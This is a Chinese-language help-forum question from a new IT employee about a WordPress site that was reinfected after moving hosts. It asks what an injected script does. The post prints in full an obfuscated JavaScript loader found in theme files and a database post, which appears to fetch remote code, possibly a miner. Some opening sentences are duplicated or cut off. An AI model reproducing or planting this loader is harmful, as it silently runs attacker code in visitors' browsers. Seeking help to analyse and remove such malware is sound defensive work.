我是一家托管约100个域名的小公司的新雇员,负责IT工作。我刚刚将我们所有的域名从一个主机移到另一个主机。
我注意到旧服务器上有一个域名感染了恶意软件,所以我将其删除并将该域名移动到我们的新服务器。
经过一周的检查,我发现恶意
这个脚本被注入到三个文件(主题的header.php、footer.php、index.php)和一个数据库条目(默认的WP“hello-world”文章)中:
我注意到旧服务器上有一个域名感染了恶意软件,所以我将其删除并将该域名移动到我们的新服务器。
经过一周的检查,我发现恶意
<script>
已重新出现在新服务器上,因此我知道感染源来自WordPress文件中(而不是被攻击的服务器)。当然,所有的登录密码都已更改。这个脚本被注入到三个文件(主题的header.php、footer.php、index.php)和一个数据库条目(默认的WP“hello-world”文章)中:
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$$_+$.$$_+$.$_$_+"\\"+$.__$+$.$$_+$._$_+"\\"+$.$__+$.___+$.$$$_+(![]+"")[$._$_]+"\\"+$.$__+$.___+"=\\"+$.$__+$.___+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"."+$.$$__+"\\"+$.__$+$.$$_+$._$_+$.$$$_+$.$_$_+$.__+$.$$$_+"\\"+$.__$+$.___+$.$_$+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+"('\\"+$.__$+$.$$_+$._$$+$.$$__+"\\"+$.__$+$.$$_+$._$_+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$$_+$.___+$.__+"');"+$.$$$_+(![]+"")[$._$_]+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"='\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$._$$+"://\\"+$.__$+$.$$_+$.$$$+$.$$$_+$.$_$$+"."+$.$$__+(![]+"")[$._$_]+$._$+$.$$_$+".\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.$$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"/\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.__$+$.___+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.$$_+$.$$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.$__+$.$$$+(![]+"")[$._$_]+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$.$__+$.$$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$$$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$._$_+$.__$+$.$_$+$.$$_$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$._$_+$.$__+$.$___+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.$__+$.___+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.___+$._$$+$.__+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+$._$_+"\\"+$.__$+$.__$+$.$$_+"\\"+$.__$+$.$$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.__$+$.___+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$._$_+$.$__+"\\"+$.__$+$.__$+$._$$+"_\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.__$+$.___+$.$_$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$__+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$._$_+$.___+$.$$__+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$$_+$.__$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.___+$.$$_+"\\"+$.__$+$.___+$.$_$+$.$$_$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$._$_+$.__$+$.$$__+"\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$._$_+$.$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.$_$+$._$$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$._$_+"\\"+$.__$+$.__$+$._$_+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.___+$._$_+"\\"+$.__$+$._$_+$.___+"\\"+$.__$+$.__$+$.$$_+$.$$__+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.__$+$.$__+$.$_$_+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+"\\"+$.__$+$.$_$+$.$_$+$.$__+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$._$$+$._$_+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$_+$.$$_+$.$$_$+"\\"+$.__$+$.___+$.$_$+"\\"+$.__$+$.__$+$.$_$+"\\"+$.__$+$.___+$.$$$+"\\"+$.__$+$._$$+$.__$+"\\"+$.__$+$.___+$.__$+"\\"+$.__$+$._$$+$.___+"\\"+$.__$+$._$_+$.__$+"\\"+$.__$+$.$$$+$.___+"\\"+$.__$+$.$$_+$.$$$+$.$_$_+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"?"+$.__+"\\"+$.__$+$.$$_+$._$_+(![]+"")[$._$_]+"="+$.___+"."+$._$$+$.___+"';"+$.$$_$+$._$+$.$$__+$._+"\\"+$.__$+$.$_$+$.$_$+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.__+".\\"+$.__$+$.$_$+$.___+$.$$$_+$.$_$_+$.$$_$+"."+$.$_$_+"\\"+$.__$+$.$$_+$.___+"\\"+$.__$+$.$$_+$.___+$.$$$_+"\\"+$.__$+$.$_$+$.$$_+$.$$_$+"\\"+$.__$+$.___+$._$$+"\\"+$.__$+$.$_$+$.___+"\\"+$.__$+$.$_$+$.__$+(![]+"")[$._$_]+$.$$_$+"("+$.$$$_+(![]+"")[$._$_]+");"+"\"")())();</script>
我的主要问题是,那段代码是做什么的?有人能运行它并告诉我它会产生什么结果吗?
此外,这是感染的最终结果的屏幕截图。调用了一些加密货币矿工(我想)。
谢谢,SO。我已经花了太多时间在这个问题上了。